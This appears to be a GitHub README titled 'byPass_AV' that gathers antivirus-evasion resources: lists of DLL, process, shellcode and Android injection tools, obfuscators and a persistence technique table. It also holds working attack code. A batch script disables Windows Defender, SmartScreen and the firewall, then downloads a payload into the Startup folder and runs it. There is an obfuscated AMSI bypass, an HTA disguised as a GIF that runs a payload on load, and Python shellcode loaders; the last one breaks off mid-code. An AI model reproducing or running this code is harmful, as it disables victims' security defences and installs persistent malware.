
Ondrik8/byPass_AV


NSGenCS(https://shells.systems/the-birth-of-nsgencs/)

Injection

  • PE Injection, DLL Injection, Process Injection, Thread Injection, Code Injection, Shellcode Injection, ELF Injection, Dylib Injection, including 400+ tools and 350+ posts

Directory

PE Injection


Tools


Post

DLL Injection


Collection


Tools

  • [1121Star][7y] [C] stephenfewer/reflectivedllinjection Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
  • [1093Star][11d] [C] fdiskyou/injectallthethings Seven different DLL injection techniques in one single project.
  • [747Star][10m] [C++] darthton/xenos Windows dll injector
  • [635Star][7m] [PS] monoxgas/srdi Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode
  • [489Star][4m] [C#] akaion/bleak A Windows native DLL injection library that supports several methods of injection.
  • [385Star][14d] [C++] opensecurityresearch/dllinjector dll injection tool that implements various methods
  • [382Star][13d] [C] wbenny/injdrv proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC
  • [277Star][2y] [C++] gellin/teamviewer_permissions_hook_v1 A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.
  • [268Star][3y] [C++] professor-plum/reflective-driver-loader injection technique base off Reflective DLL injection
  • [227Star][10d] [C++] wunkolo/uwpdumper DLL and Injector for dumping UWP applications at run-time to bypass encrypted file system protection.
  • [197Star][2y] [C] sud01oo/processinjection Some ways to inject a DLL into a live process
  • [190Star][10d] [C++] hzphreak/vminjector DLL Injection tool to unlock guest VMs
  • [185Star][19d] [C++] jonatan1024/clrinject Inject a C# EXE or DLL assembly into an arbitrary CLR runtime or into another process's AppDomain
  • [178Star][1m] [Py] infodox/python-dll-injection Python toolkit for injecting DLL files into running processes on Windows
  • [177Star][11m] [C++] strivexjun/driverinjectdll Using Driver Global Injection dll, it can hide DLL modules
  • [146Star][4y] [C] dismantl/improvedreflectivedllinjection An improvement of the original reflective DLL injection technique by Stephen Fewer of Harmony Security
  • [113Star][2m] [C] rsmusllp/syringe A General Purpose DLL & Code Injection Utility
  • [110Star][7y] [C++] abhisek/pe-loader-sample Proof of concept implementation of in-memory PE Loader based on ReflectiveDLLInjection Technique
  • [87Star][2m] [C] countercept/doublepulsar-usermode-injector A utility to use the usermode shellcode from the DOUBLEPULSAR payload to reflectively load an arbitrary DLL into another process, for use in testing detection techniques or other security research.
  • [86Star][3y] [C] zerosum0x0/threadcontinue Reflective DLL injection using SetThreadContext() and NtContinue()
  • [82Star][6m] [C++] nefarius/injector Command line utility to inject and eject DLLs
  • [73Star][4m] [C] danielkrupinski/memject Simple Dll injector loading from memory. Supports PE header and entry point erasure. Written in C99.
  • [62Star][15d] [Py] psychomario/pyinject A python module to help inject shellcode/DLLs into windows processes
  • [61Star][3y] [C] arvanaghi/windows-dll-injector A basic Windows DLL injector in C using CreateRemoteThread and LoadLibrary. Implemented for educational purposes.
  • [59Star][3y] [C++] azerg/remote_dll_injector Stealth DLL injector
  • [56Star][1y] [C] rapid7/reflectivedllinjection Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
  • [53Star][5m] [C] adrianyy/keinject Kernel LdrLoadDll injector
  • [52Star][5m] [C] nccgroup/ncloader A session-0 capable dll injection utility
  • [52Star][3y] [C++] zer0mem0ry/standardinjection A simple Dll Injection demonstration
  • [51Star][19d] [C++] papadp/reflective-injection-detection a program to detect reflective dll injection on a live machine
  • [50Star][1y] [C] realoriginal/reflective-rewrite Attempt to rewrite StephenFewers Reflective DLL Injection to make it a little more stealthy. Some code taken from Meterpreter & sRDI. Currently a work in progress.
  • [49Star][3y] [C++] zodiacon/dllinjectionwiththreadcontext This is a sample that shows how to leverage SetThreadContext for DLL injection
  • [42Star][3y] [C++] zer0mem0ry/manualmap A Simple demonstration of manual dll injector
  • [38Star][26d] [C++] rolfrolles/wbdeshook DLL-injection based solution to Brecht Wyseur's wbDES challenge (based on SysK's Phrack article)
  • [38Star][2m] [Assembly] danielkrupinski/inflame User-mode Windows DLL injector written in Assembly language (FASM syntax) with WinAPI.
  • [37Star][4m] [C++] nanoric/pkn core of pkn game hacking project. Including mainly process management, memory management, and DLL injection. Also PE analysis, Windows registry management, compile-time string encryption, byte-code emulator, etc. Most of them can run under kernel mode.
  • [36Star][7m] [C++] blole/injectory command-line interface dll injector
  • [33Star][3m] [C++] notscimmy/libinject Currently supports injecting signed/unsigned DLLs in 64-bit processes
  • [31Star][4m] [Py] fullshade/poppopret-nullbyte-dll-bypass A method to bypass a null byte in a POP-POP-RETN address for exploiting local SEH overflows via DLL injection
  • [30Star][6m] [C++] psmitty7373/eif Evil Reflective DLL Injection Finder
  • [29Star][4m] [C++] m-r-j-o-h-n/swh-injector An Injector that can inject dll into game process protected by anti cheat using SetWindowsHookEx.
  • [29Star][4y] [C++] stormshield/beholder-win32 A sample on how to inject a DLL from a kernel driver
  • [28Star][4m] [Py] fullshade/py-memject A Windows .DLL injector written in Python
  • [27Star][6m] [HTML] flyrabbit/winproject Hook, DLLInject, PE_Tool
  • [27Star][4m] [C] ice3man543/zeusinjector An Open Source Windows DLL Injector With All Known Techniques Available
  • [27Star][5y] [C] olsut/kinject-x64 Kinject - kernel dll injector, currently available in x86 version, will be updated to x64 soon.
  • [27Star][5m] [C] sqdwr/loadimageinject LoadImage Routine Inject Dll
  • [25Star][1y] [C#] enkomio/managedinjector A C# DLL injection library
  • [25Star][6y] [C] whyallyn/paythepony Pay the Pony is hilarityware that uses the Reflective DLL injection library to inject into a remote process, encrypt and demand a ransom for files, and inflict My Little Pony madness on a system.
  • [24Star][2m] [C#] tmthrgd/dll-injector Inject and detour DLLs and program functions both managed and unmanaged in other programs, written (almost) purely in C#. [Not maintained].
  • [21Star][3y] [C] al-homedawy/injector A Windows driver used to facilitate DLL injection
  • [21Star][5y] [C] nyx0/dll-inj3cti0n Another dll injection tool.
  • [21Star][29d] [C++] coreyauger/slimhook Demonstration of dll injection. As well loading .net runtime and calling .net code. Example hijacking d3d9 dll and altering rendering of games.
  • [17Star][12m] [C] strobejb/injdll DLL Injection commandline utility
  • [17Star][5m] [C#] cameronaavik/ilject Provides a way which you can load a .NET dll/exe from disk, modify/inject IL, and then run the assembly all in memory without modifying the file.
  • [15Star][2y] [C] ntraiseharderror/phage Reflective DLL Injection style process infector
  • [15Star][3y] [C] portcullislabs/wxpolicyenforcer Injectable Windows DLL which enforces a W^X memory policy on a process
  • [14Star][4m] [C#] ulysseswu/vinjex A simple DLL injection lib using Easyhook, inspired by VInj.
  • [13Star][1y] [C++] matrix86/wincodeinjection Dll Injection and Code injection sample
  • [13Star][4y] [C++] spl0i7/dllinject Mineweeper bot by DLL Injection
  • [12Star][4m] [C++] sherazibrahim/dll-injector I created a dll injector I am going to Open source its Code. But remember one thing that is any one can use it only for Educational purpose .I again say do not use it to damage anyone's Computer.But one thing if you are using it for some good purpose like to help someone who really need help then I permit you to use it.
  • [11Star][9m] [C#] ihack4falafel/dll-injection C# program that takes process id and path to DLL payload to perform DLL injection method.
  • [9Star][18d] [C++] pfussell/pivotal A MITM proxy server for reflective DLL injection through WinINet
  • [9Star][9m] [C] userexistserror/injectdll Inject a Dll from memory
  • [9Star][1y] [Assembly] dentrax/dll-injection-with-assembly DLL Injection to Exe with Assembly using OllyDbg
  • [7Star][1y] [C] haidragon/newinjectdrv Kernel-mode DLL injection via APC
  • [6Star][2y] thesph1nx/covenant Meterpreter clone - DLL Injection Backdoor
  • [5Star][5y] [C++] ciantic/remotethreader Helps you to inject your dll in another process
  • [5Star][4m] [C++] reclassnet/reclass.net-memorypipeplugin A ReClass.NET plugin which allows direct memory access via dll injection.
  • [1Star][1y] [PS] getrektboy724/maldll A bunch of malicious DLLs to inject into a process

Post

Process Injection


Tools


Post

Thread Injection


Tools


Post

Code Injection


Tools

  • [6260Star][10d] [ObjC] johnno1962/injectionforxcode Runtime Code Injection for Objective-C & Swift
  • [2386Star][2y] [Py] danmcinerney/lans.py Inject code and spy on wifi users
  • [1685Star][11d] [Py] epinna/tplmap Server-Side Template Injection and Code Injection Detection and Exploitation Tool
  • [1470Star][4m] [Swift] johnno1962/injectioniii Re-write of Injection for Xcode in (mostly) Swift4
  • [1112Star][14d] [ObjC] dyci/dyci-main Dynamic Code Injection Tool for Objective-C
  • [983Star][3y] [C] cybellum/doubleagent Zero-Day Code Injection and Persistence Technique
  • [614Star][16d] [C++] breakingmalwareresearch/atom-bombing Brand New Code Injection for Windows
  • [265Star][5y] [C++] breakingmalware/powerloaderex Advanced Code Injection Technique for x32 / x64
  • [249Star][8y] rentzsch/mach_star code injection and function overriding for Mac OS X
  • [228Star][12d] [C++] marcosd4h/memhunter Live hunting of code injection techniques
  • [214Star][17d] [C] peperunas/injectopi A set of tutorials about code injection for Windows.
  • [186Star][7m] [ObjC] nakiostudio/twitterx Keeping Twitter for macOS alive with code injection
  • [170Star][2y] [Py] undeadsec/debinject Inject malicious code into *.debs
  • [116Star][22d] [C#] p0cl4bs/hanzoinjection injecting arbitrary codes in memory to bypass common antivirus solutions
  • [91Star][2m] [Py] hackatnow/cromos Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application.
  • [90Star][4y] [Java] zerothoughts/spring-jndi Proof of concept exploit, showing how to do bytecode injection through untrusted deserialization with Spring Framework 4.2.4
  • [66Star][2y] [Java] sola-da/synode Automatically Preventing Code Injection Attacks on Node.js
  • [65Star][3y] [Py] sethsec/pycodeinjection Automated Python Code Injection Tool
  • [65Star][3m] [Py] tbarabosch/quincy Detects host-based code injection attacks in memory dumps
  • [49Star][2m] [C#] guibacellar/dnci DNCI - Dot Net Code Injector
  • [48Star][3y] [C++] tonyzesto/pubgprivxcode85 Player ESP 3D Box ESP Nametag ESP Lightweight Code Secure Injection Dedicated Cheat Launcher Secured Against Battleye Chicken Dinner Every Day. Win more matches than ever before with CheatAutomation’s Playerunknown’s Battlegrounds cheat! Our stripped down, ESP only cheat gives you the key features you need to take out your opponents and be eatin…
  • [47Star][1y] [C] yifanlu/3ds_injector Open source implementation of loader module with code injection support
  • [46Star][7m] [C] rodionovd/task_vaccine Yet another code injection library for OS X
  • [37Star][2m] [C] sduverger/ld-shatner ld-linux code injector
  • [34Star][2y] [C++] ntraiseharderror/dreadnought PoC for detecting and dumping code injection (built and extended on UnRunPE)
  • [27Star][4y] [Java] zerothoughts/jndipoc Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls
  • [27Star][6m] [Java] dinject/dinject Dependency injection via APT (source code generation) ala "Server side Dagger DI"
  • [25Star][7m] [Py] batteryshark/miasma Cross-Platform Binary OTF Patcher, Code Injector, Hacking Utility
  • [25Star][3y] [C++] hatriot/delayloadinject Code injection via delay load libraries
  • [20Star][2y] [c] odzhan/propagate PROPagate code injection technique example
  • [19Star][3y] [Swift] depoon/injectiblelocationspoofing Location Spoofing codes for iOS Apps via Code Injection
  • [18Star][6y] [ObjC] mhenr18/injector Code injection + payload communications for OSX (incl. sandboxed apps)
  • [17Star][2m] [C++] sunsided/native-dotnet-code-injection Injection of managed code into non-managed Windows applications
  • [14Star][2m] [C#] gerich-home/lua-inject Inject any C# code into programs with lua
  • [13Star][3y] [C] tbarabosch/1001-injects Tiny research project to understand code injections on Linux based systems
  • [13Star][3m] [C++] revsic/codeinjection Code Injection technique written in cpp language
  • [11Star][2y] [C] gdbinit/calcspace Small util to calculate available free space in mach-o binaries for code injection
  • [11Star][7y] [C#] yifanlu/vitainjector Inject userland ARM code through PSM
  • [9Star][19d] [Py] bao7uo/waf-cookie-fetcher WAF Cookie Fetcher is a Burp Suite extension written in Python, which uses a headless browser to obtain the values of WAF-injected cookies which are calculated in the browser by client-side JavaScript code and adds them to Burp's cookie jar. Requires PhantomJS.
  • [9Star][6m] [Py] mpgn/cve-2018-16341 CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
  • [7Star][2y] [PHP] jpapayan/aspis A PHP code transformer to provide protection against injection attacks
  • [6Star][2y] [Py] andreafortuna/pycodeinjector Python code injection library
  • [4Star][1y] [Java] righettod/injection-cheat-sheets Provide some tips to handle Injection into application code (OWASP TOP 10 - A1).
  • [2Star][2y] [Standard ML] 11digits/php-clean-malware Simple PHP code to assist in cleaning of injected malware PHP code
  • [2Star][9m] [C++] thepwnrip/code-injection A collection of methods of Code Injection on Windows
  • [1Star][1y] [C++] smore007/remote-iat-hook Remote IAT hook example. Useful for code injection
  • [NoneStar][Py] thelinuxchoice/eviloffice Inject Macro and DDE code into Excel and Word documents (reverse shell)

Post

Shellcode Injection


Tools

  • [2209Star][4m] [Py] trustedsec/unicorn Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
  • [476Star][21d] [Py] trustedsec/meterssh a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection.
  • [225Star][4m] [PS] outflanknl/excel4-dcom PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
  • [112Star][2m] [C++] josh0xa/threadboat uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
  • [77Star][4m] [C] dimopouloselias/simpleshellcodeinjector receives as an argument a shellcode in hex and executes it
  • [66Star][2m] [Py] sensepost/anapickle Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode.
  • [43Star][1m] [Py] borjamerino/tlsinjector Python script to inject and run shellcodes through TLS callbacks
  • [27Star][2y] [Py] taroballzchen/shecodject shecodject is an autoscript for shellcode injection written in Python 3
  • [19Star][5y] [C] jorik041/cymothoa Cymothoa is a backdooring tool, that inject backdoor's shellcode directly into running applications. Stealth and lightweight...
  • [16Star][9m] [PLpgSQL] michaelburge/redshift-shellcode Example of injecting x64 shellcode into Amazon Redshift
  • [10Star][1y] [C++] egebalci/injector Simple shellcode injector.
  • [4Star][3y] [Shell] thepisode/linux-shellcode-generator Experiments on Linux Assembly shellcodes injection
  • [NoneStar][Go] pioneerhfy/goback GOback is a backdoor written in Go that uses the shellcode injection technique for achieving its task.

Post

ELF Injection


Tools

  • [269Star][10d] [Shell] cytopia/pwncat pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
  • [106Star][14d] [C] comsecuris/luaqemu QEMU-based framework exposing several of QEMU-internal APIs to a LuaJIT core injected into QEMU itself. Among other things, this allows fast prototyping of target systems without any native code and minimal effort in Lua.
  • [73Star][10d] [C] zznop/drow Injects code into ELF executables post-build
  • [45Star][1m] [C] jmpews/evilelf Malicious use of ELF such as .so inject, func hook and so on.
  • [26Star][4m] [C++] shaxzy/nixware-csgo Source code of Nixware. Cheat doesn't inject for some reason, fix it yourself or just paste from it
  • [9Star][3m] [C] mfaerevaag/elfinjector Code injector for ELF binaries (incl. PIE)
  • [1Star][2y] [JS] mshoop/web-xss-attack Exploring website security through cross-site scripting attacks, maliciously injected JavaScript and self-propagating worms

Post

Dylib Injection


Tools

  • [2032Star][3y] [Swift] urinx/iosapphook Focused on reverse engineering iOS apps in non-jailbroken environments, from dylib injection and app re-signing to app hooking
  • [752Star][5y] [ObjC] kjcracks/yololib dylib injector for mach-o binaries
  • [506Star][13d] [Objective-C++] bishopfox/bfinject Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks
  • [191Star][3m] [Swift] codesourse/iinjection an app for OS X that can inject dylib and (re)sign apps and bundle them into ipa files that are ready to be installed on an iOS device.
  • [173Star][16d] [C] scen/osxinj osx dylib injection

Post

Android


Tools

  • [1300Star][4m] [JS] megatronking/httpcanary A powerful capture and injection tool for the Android platform
  • [475Star][3y] [Smali] sensepost/kwetza Python script to inject existing Android applications with a Meterpreter payload.
  • [447Star][9m] [Java] megatronking/netbare Net packets capture & injection library designed for Android
  • [252Star][16d] [Py] feicong/jni_helper Android SO automatic injection
  • [148Star][4m] [Java] zhouat/inject-hook for android
  • [144Star][3y] [C] xmikos/setools-android Unofficial port of setools to Android with additional sepolicy-inject utility included
  • [136Star][11d] [Lua] lanoox/luject A static injector of dynamic library for application (android, iphoneos, macOS, windows, linux)
  • [122Star][5y] irsl/adb-backup-apk-injection Android ADB backup APK Injection POC
  • [97Star][4y] [Shell] jlrodriguezf/whatspwn Linux tool used to extract sensitive data, inject backdoor or drop remote shells on android devices.
  • [76Star][4y] [Py] moosd/needle Android framework injection made easy
  • [56Star][4m] [C] shunix/tinyinjector Shared Library Injector on Android
  • [55Star][4m] [Java] igio90/fridaandroidinjector Inject frida agents on local processes through an Android app
  • [52Star][2m] [Py] alessandroz/pupy Pupy is an opensource, multi-platform (Windows, Linux, OSX, Android), multi function RAT (Remote Administration Tool) mainly written in python.
  • [52Star][14d] [TS] whid-injector/whid-mobile-connector Android Mobile App for Controlling WHID Injector remotely.
  • [48Star][16d] [Py] ikoz/jdwp-lib-injector inject native shared libraries into debuggable Android applications
  • [46Star][30d] [Shell] jbreed/apkinjector Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.
  • [40Star][8m] [Java] ivianuu/contributer Inject all types like views or a conductor controllers with @ContributesAndroidInjector
  • [33Star][1y] [Groovy] eastwoodyang/autoinject A general-purpose automatic component registration and initialization solution for Android
  • [30Star][6m] [Java] cristianturetta/mad-spy We developed a malware for educational purposes. In particular, our goal is to provide a PoC of what is known as a Repacking attack, a known technique widely used by malware cybercrooks to trojanize android apps. The answer to solve this particular goal boils down in the simplicity of APK decompiling and smali code injection.
  • [24Star][5m] [Smali] aress31/sci Framework designed to automate the process of assembly code injection (trojanising) within Android applications.
  • [13Star][11m] [JS] cheverebe/android-malware Injected malicious code into legitimate Android applications. Converted a keyboard app into a keylogger and an MP3 downloader into an image thief.

Post

Other


Tools

Engineering antivirus evasion(https://blog.scrt.ch/2020/06/19/engineering-antivirus-evasion/)

Obfuscation

https://github.com/xoreaxeaxeax/movfuscator

https://github.com/danielbohannon/Invoke-DOSfuscation

https://github.com/unixpickle/gobfuscate - GO Obfuscator

https://github.com/NotPrab/.NET-Obfuscator - Lists of .NET Obfuscator (Free, Trial, Paid and Open Source )

https://github.com/javascript-obfuscator/javascript-obfuscator - Javascript Obfuscator

https://github.com/danielbohannon/Invoke-Obfuscation - Powershell Obfuscator

https://github.com/BinaryScary/NET-Obfuscate - .NET IL Obfuscator

https://github.com/scrt/avcleaner - C/C++ source obfuscator for antivirus bypass

https://github.com/meme/hellscape - GIMPLE obfuscator for C, C++, Go, ... all supported GCC targets and front-ends that use GIMPLE.

https://github.com/mgeeky/VisualBasicObfuscator - VBS Obfuscator

https://github.com/3xpl01tc0d3r/Obfuscator - Shellcode Obfuscator

https://github.com/EgeBalci/sgn - Shellcode Encoder


https://github.com/lengjibo/FourEye

https://github.com/swagkarna/Defeat-Defender

@echo off
:: BatchGotAdmin
::-------------------------------------
REM  --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"="
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"

takeown /f "%systemroot%\System32\smartscreen.exe" /a
icacls "%systemroot%\System32\smartscreen.exe" /reset
taskkill /im smartscreen.exe /f


powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

powershell.exe -command "Set-MpPreference -PUAProtection disable"

powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"

powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"

powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"

powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"

powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

powershell.exe -command "Set-MpPreference -MAPSReporting 0"
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

powershell.exe -command "netsh advfirewall set allprofiles state off"

cd  %temp%
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe', '.\NSudo.exe') }
 
NSudo.exe -U:T -ShowWindowMode:Hide sc stop WinDefend 

cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://direct-url/foryour-payload', '.\payload.exe') }
start payload.exe 

shellcode_obfuscator

SHELLcode

https://github.com/Gr1mmie/SharpShellCodeObfus
https://github.com/ChoiSG/UuidShellcodeExec
https://github.com/alphaSeclab/shellcode-resources

PS(https://github.com/specterops/at-ps/blob/master/Adversary%20Tactics%20-%20PowerShell.pdf)

PowerShell evasion tactics

[DLL_reflect]

https://github.com/stephenfewer/ReflectiveDLLInjection
https://github.com/DarthTon/Blackbone Swiss army knife
https://github.com/dismantl/ImprovedReflectiveDLLInjection this one is very very cool
https://github.com/Professor-plum/Reflective-Driver-Loader very cool as well
https://github.com/countercept/doublepulsar-usermode-injector
https://github.com/azerton/dll_inject_test
https://github.com/ru-faraon/pupy
https://github.com/floomby/injector
https://github.com/amishsecurity/paythepony
https://github.com/BorjaMerino/Pazuzu
https://github.com/Frenda/libScanHook/blob/master/libScanHook/PeLoader.cpp
https://github.com/apriorit/ReflectiveDLLInjection
https://github.com/uItra/Injectora
https://github.com/fancycode/MemoryModule
https://github.com/mq1n/SonicInjector

Various tools:
https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher
https://github.com/CylanceVulnResearch/upx/tree/reflective_dll
https://github.com/papadp/reflective-injection-detection
https://github.com/xorrior/WebCam_Dll
https://github.com/psmitty7373/eif
https://github.com/azerton/dll_inject_test
https://github.com/hirnschallsebastian/Breach
https://wikileaks.org/ciav7p1/cms/page_14588718.html
https://github.com/jaredhaight/ReflectCmd
https://www.codeproject.com/Articles/44326/MinHook-The-Minimalistic-x-x-API-Hooking-Libra
https://github.com/Jyang772/XOR_Crypter/tree/master/Stub
https://github.com/thereals0beit/RemoteFunctions

Documentation, blog posts and videos:
https://www.endgame.com/blog/technical-blog/hunting-memory
https://en.wikipedia.org/wiki/Portable_Executable
https://upload.wikimedia.org/wikipedia/commons/1/1b/Portable_Executable_32_bit_Structure_in_SVG_fixed.svg
http://stackoverflow.com/questions/18362368/loading-dlls-at-runtime-in-c-sharp
https://www.countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/
https://www.countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/
https://zerosum0x0.blogspot.dk/2017/04/doublepulsar-initial-smb-backdoor-ring.html
https://www.codeproject.com/Articles/20084/A-More-Complete-DLL-Injection-Solution-Using-Creat
http://blog.harmonysecurity.com/2008/10/new-paper-reflective-dll-injection.html
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html
https://disman.tl/2015/03/16/cross-architecture-reflective-dll-inection.html
https://www.youtube.com/watch?v=9U6dtRtSuFo&index=11&list=PLcTmaBQIhUkgvwz3k-JGHUcDlS41fim0x
https://www.youtube.com/watch?v=9L9I1T5QDg

Interesting Microsoft documentation:
https://blogs.msdn.microsoft.com/ntdebugging/2009/01/09/challenges-of-debugging-optimized-x64-code/
https://msdn.microsoft.com/en-us/library/4khtbfyf
https://msdn.microsoft.com/en-us/library/69ze775t.aspx

amsybypass

$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') 
$h="4456625220575263174452554847" 
$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " " 
$b =$a.GetField($s,'NonPublic,Static') 
$b.SetValue($null,$true)

java obfuscator (GUI)

java obfuscator

graffitibanner

https://www.youtube.com/watch?v=xNhQMwC0BLo&feature=emb_logo

https://github.com/Ekultek/Graffiti

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Powershell_Fernet_Obfuscator

https://github.com/TheEyeOfCyber/FernHunt_WindowsPowershell-Obfuscator

Persistence techniques

Code Technique MITRE ATT&CK ID
PE-001 Winlogon Helper DLL T1004
PE-002 Port Monitors T1013
PE-003 Accessibility Features T1015
PE-004 Shortcut Modification T1023
PE-005 Modify Existing Service T1031
PE-006 DLL Search Order Hijacking T1038
PE-007 Change Default File Association T1042
PE-008 New Service T1050
PE-009 Scheduled Tasks T1053
PE-010 Service Registry Permission Weakness T1058
PE-011 Registry Run Keys T1060
PE-012 WMI Event Subscription T1084
PE-013 Security Support Provider T1101
PE-014 AppInit DLLs T1103
PE-015 Component Object Model Hijacking T1122
PE-016 Netsh Helper DLL T1128
PE-017 Office Application Startup T1137
PE-018 Application Shimming T1138
PE-019 Screensaver T1180
PE-020 Image File Execution Options Injection T1183
PE-021 BITS Jobs T1197
PE-022 Time Providers T1209
PE-023 PowerShell Profile T1504
PE-024 Waitfor N/A
PE-025 RID Hijacking N/A

Blogs

Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge

https://jhalon.github.io/utilizing-syscalls-in-csharp-1/

Tools

Stealing Signatures

B2E

EVIL GIF

<html>
<head>
<title>NazvanieGif</title>
<hta:application id="NazvanieGif"
border="thin"
borderstyle="complex"
maximizeButton="no"
minimizeButton="no"
/>
</head>
<script type="text/javascript">
var index = -1;
var images = [
"data:image/gif;base64,                                             "];
function initGallery(){
window.resizeTo(300,300);
htaPayload();
nextPicture();
}
function nextPicture(){
var img;
index = index + 1;
if (index > images.length -1 ){
index = 0;
}
img = document.getElementById("gallery");
img.src = images[index];
}
function htaPayload(){
var payload="calc.exe";
try{
if (navigator.userAgent.indexOf("Windows") !== -1){
new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
}
}
catch(e){
}
}
</script>
<style>
#gallery, div {
width: 100%;
height: 100%;
}
#outer {
text-align: center;
}
#inner{
display: inline-block;
}
body {
background-color: black;
}
</style>
<body onload="initGallery()">
<div id="outer">
<div id="inner">
<img id="gallery" onclick="nextPicture()">
</div>
</div>
</body>
</html>



Non-interactive Installation PYTHON

msiexec /i python<version>.msi

https://www.python.org/download/releases/2.5/msi/
# python2
import ctypes

payload = ""
shellcode = bytearray(payload)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
```python
import ctypes

shellcode = ""
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
```

```python
import ctypes

buf = ""
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr:
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    if 1:
        ctypes.windll.user32.ShowWindow(whnd, 0)
        ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                      ctypes.c_int(len(shellcode)),
                                                      ctypes.c_int(0x3000),
                                                      ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old))
